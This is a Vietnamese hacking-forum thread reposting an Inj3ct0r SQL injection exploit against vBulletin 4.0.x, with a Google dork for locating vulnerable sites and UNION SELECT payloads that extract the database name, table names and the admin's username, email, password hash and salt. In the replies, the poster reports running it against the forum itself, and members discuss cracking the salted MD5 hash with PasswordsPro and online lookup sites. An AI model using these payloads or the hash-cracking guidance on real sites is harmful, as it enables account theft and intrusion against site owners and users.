Gửi Thông Điệp Yêu Thương vanbinh_bt nhắn với all: thi sao rồi mấy đồ...[Mr]-Boom nhắn với All K4: Chúc mọi người có 1 kỳ thi thật tốt !!lặng lẽ yêu nhắn với nguyễn ngọc huy: chúc mi có một kỳ thi tốt nha. vẫn nhớ mingocthongcctm05f nhắn với QNGAI: hãy sát cánh bên nhau.....hi.......trinhvh91 nhắn với TM03B: TM03B đoàn kết đi chơi cuối khóa nghenNgười vô cảm nhắn với nguyenlu: Ai vậy? T vẫn bước đi trong yêu thương mà ^^381 nhắn với neyugn: mong rằng chúng ta sẽ đi đến cái đích cuối cùng !nguyenlu nhắn với Người vô cảm: Hãy bước đi trong sự yêu thươnglenguyen_alone nhắn với Young Bin: tại sao nhok lại iu bin chứ nhỉ???hp thành công nhá!!binhcaolinh nhắn với Đen Trần: Cố gắng học chăm chỉ nhé em! Gửi Thông Điệp Yêu Thương


BẢNG GIÁ QUẢNG CÁO TẠI DIỄN ĐÀN 2MIT.ORG 2012

Trang 1/2 12 cuốicuối
Hiện kết quả từ 1 tới 10 của 12

Chủ đề: [Hacking] SQL Injection VBB 4.x.x

  1. #1
    Tham gia ngày
    Sep 2010
    Đến từ
    Quảng Trị
    Tuổi
    19
    Bài gửi
    1,315
    Cảm ơn
    794
    Được cảm ơn 1,301/472 bài viết
    Blog Entries
    2
    16
    MASTER
     
     
    Số lần cộng|trừ: 1 lần

    Default [Hacking] SQL Injection VBB 4.x.x




    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0 _ __ __ __ 1
    1 /' \ __ /'__`\ /\ \__ /'__`\ 0
    0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
    1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
    0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
    1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
    0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
    1 \ \____/ >> Exploit database separated by exploit 0
    0 \/___/ type (local, remote, DoS, etc.) 1
    1 1
    0 [+] Site : 1337day.com 0
    1 [+] Support e-mail : submit[at]1337day.com 1
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    #[+] Discovered By : D4rkB1t
    #[+] Site : 1337day.com Inj3ct0r Team
    #[+] support e-mail : d4rkb1t@live.com

    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"

    --------------------------
    # ~Vulnerable Codes~ #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;

    --------------------------
    # ~Exploit~ #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"

    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    More info: http://j0hnx3r.org/?p=818

    Thank my friends from Inj3ct0r Team (1337day.com)

    --------------------------
    # ~Advice~ #
    --------------------------
    Vendor already released a patch on vb#4.1.3.
    UPDATE NOW!

    Use HTTP debugger...
    Or please watch this video to understand more: http://www.youtube.c...h?v=fR9RGCqIPkc

    ---------------------

    vBulletin 4.X Security Patch

    http://www.vbulletin...4495&PID=564936

    ================================================== ==================
    # #
    # 888 d8 888 _ 888 ,d d8 #
    # e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
    # d888 888 d888 888 888d8b 888 888b 888 888 #
    # 8888 888 / 888 888 888Y88b 888 8888 888 888 #
    # Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
    # "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
    # #
    ================================================== ==================


    # 1337day.com [2011-05-21]

    --------------------------------------------------
    Xem các chủ đề cùng chuyên mục:


    +4 EXP
    Thông tin



  2. Có tổng cộng 4 thành viên cảm ơn interpol cho bài viết này

    killyou117 (04-10-2011), Special one (10-10-2011), sunboy (25-05-2011), viethung_9x  (26-05-2011)

  3. #2
    Tham gia ngày
    May 2009
    Đến từ
    Ha Noi, Vietnam, Vietnam
    Tuổi
    21
    Bài gửi
    1,565
    Cảm ơn
    1,103
    Được cảm ơn 1,245/501 bài viết
    Blog Entries
    13
    9
    MASTER
     
     
    Số lần cộng|trừ: 5 lần

    Default

    4.0.x chứ không phải 4.x.x em


  4. #3
    Tham gia ngày
    Sep 2010
    Đến từ
    Quảng Trị
    Tuổi
    19
    Bài gửi
    1,315
    Cảm ơn
    794
    Được cảm ơn 1,301/472 bài viết
    Blog Entries
    2
    16
    MASTER
     
     
    Số lần cộng|trừ: 1 lần

    Default

    Trích Nguyên văn bởi sunboy Xem bài viết
    4.0.x chứ không phải 4.x.x em
    Ở các phiên bản vbb cao hơn vẫn truy vấn ra được đoạn password đã được mã hóa.
    Em đã thử với 2mit. và kết quả vẫn ra bình thường.
    Hiện tại vẫn chưa crack được đoạn đó

    Thông tin



  5. #4
    Tham gia ngày
    May 2009
    Đến từ
    Ha Noi, Vietnam, Vietnam
    Tuổi
    21
    Bài gửi
    1,565
    Cảm ơn
    1,103
    Được cảm ơn 1,245/501 bài viết
    Blog Entries
    13
    9
    MASTER
     
     
    Số lần cộng|trừ: 5 lần

    Default

    Ok, thank em.
    Anh cũng thấy bên vietmatrix có post. Nhưng không để ý lắm vì nội dung eploit rõ ràng ghi Version: 4.0.x . Ai ngờ 4.1.0 vẫn dính... Tạm thời disable vậy..


  6. #5
    Tham gia ngày
    Sep 2010
    Đến từ
    Quảng Trị
    Tuổi
    19
    Bài gửi
    1,315
    Cảm ơn
    794
    Được cảm ơn 1,301/472 bài viết
    Blog Entries
    2
    16
    MASTER
     
     
    Số lần cộng|trừ: 1 lần

    Default

    Crack mãi không ra đoạn password Bị thiếu Dictionary

    Thông tin



  7. #6
    Tham gia ngày
    May 2009
    Đến từ
    Ha Noi, Vietnam, Vietnam
    Tuổi
    21
    Bài gửi
    1,565
    Cảm ơn
    1,103
    Được cảm ơn 1,245/501 bài viết
    Blog Entries
    13
    9
    MASTER
     
     
    Số lần cộng|trừ: 5 lần

    Default

    Trích Nguyên văn bởi interpol Xem bài viết
    Crack mãi không ra đoạn password Bị thiếu Dictionary
    Đã dính SQL injection, thiếu gì cách mà phải crack pass...


  8. #7
    Tham gia ngày
    Sep 2010
    Đến từ
    Quảng Trị
    Tuổi
    19
    Bài gửi
    1,315
    Cảm ơn
    794
    Được cảm ơn 1,301/472 bài viết
    Blog Entries
    2
    16
    MASTER
     
     
    Số lần cộng|trừ: 1 lần

    Default

    Dù truy vấn được nhưng cũng chỉ ra đoạn password đã được mã hóa.
    Dùng passwordpro vẫn chưa crack được do thiếu dictionary.
    Đúng là khó mà ăn được VBB :d

    Thông tin



  9. #8
    Tham gia ngày
    Oct 2009
    Đến từ
    LT03C
    Tuổi
    21
    Bài gửi
    342
    Cảm ơn
    243
    Được cảm ơn 268/110 bài viết
    3
    Professional
     
     
    Số lần cộng|trừ: 0 lần

    Default

    Bài này chỉ mang tính chất tham khảo là chính. Đến bây giờ cũng chưa có forum nào bị hack kiểu này cả. Dù tìm được pass nhưng pass đã được mã hóa MD5 như thế có mà giải bằng niềm tin à. .

    Á thật ra không phải là không dịch ngược được từ dạng mã hóa MD5 về gốc. Mình nhớ có đọc được ở đâu đó họ nói răng. Dùng siêu máy tính có tốc độ hàng trăm teraflop (một teraflop tương đương với hiệu suất một nghìn tỷ phép tính/giây)thì mất khoảng 5 năm để giải mã. => MD5 không phải là dạng mã hóa 1 chiều theo đúng nghĩa.

    +1 EXP

  10. #9
    Tham gia ngày
    Sep 2010
    Đến từ
    Quảng Trị
    Tuổi
    19
    Bài gửi
    1,315
    Cảm ơn
    794
    Được cảm ơn 1,301/472 bài viết
    Blog Entries
    2
    16
    MASTER
     
     
    Số lần cộng|trừ: 1 lần

    Default

    VBB không chỉ mã hóa password theo kiểu md5 bình thường.
    Mình đang sử dụng passwordpro 3.1 Đang crack thử

    Thông tin



  11. #10
    Tham gia ngày
    May 2009
    Đến từ
    Ha Noi, Vietnam, Vietnam
    Tuổi
    21
    Bài gửi
    1,565
    Cảm ơn
    1,103
    Được cảm ơn 1,245/501 bài viết
    Blog Entries
    13
    9
    MASTER
     
     
    Số lần cộng|trừ: 5 lần

    Default

    Md5 thì có thể ra (sha còn chơi được)...Cụ thể thế này.
    hash = md5($pass) . $salt)
    MD5 và SHA1 hơi xịn : http://www.md5decrypter.co.uk/
    Này thì Joomla, VBB, MyBB, IPB... http://www.cmd5.org/

    PS: Mấy cu cậu đừng test trên forum mình nhá,,, dựng cái lên test .

    Thay đổi nội dung bởi: sunboy, 26-05-2011 lúc 12:18 PM

Trang 1/2 12 cuốicuối

Thông tin về chủ đề này

Users Browsing this Thread

Hiện giờ đang có 1 người xem chủ đề này. (0 thành viên 1 khách)

     

Chủ đề giống nhau

  1. Căn bản hack 1 website bị lỗi SQL Injection
    By chip in forum Thảo luận các vấn đề về CEH
    Trả lời: 15
    Bài mới gửi: 15-05-2012, 04:00 PM
  2. Mod SEO vbb Tăng Ranh Cho website, forum,VBB,PHP
    By lyvinhr00m in forum Source code
    Trả lời: 2
    Bài mới gửi: 29-12-2010, 01:56 PM
  3. Tự học SQL+SQL server 2000
    By jinyotino in forum Hệ thống thông tin
    Trả lời: 1
    Bài mới gửi: 26-09-2010, 12:04 PM
  4. Trả lời: 3
    Bài mới gửi: 15-10-2009, 01:49 PM
  5. Một số video hacking hay!
    By chip in forum Video hacking
    Trả lời: 0
    Bài mới gửi: 22-05-2009, 12:32 PM

2080
Lượt xem

Share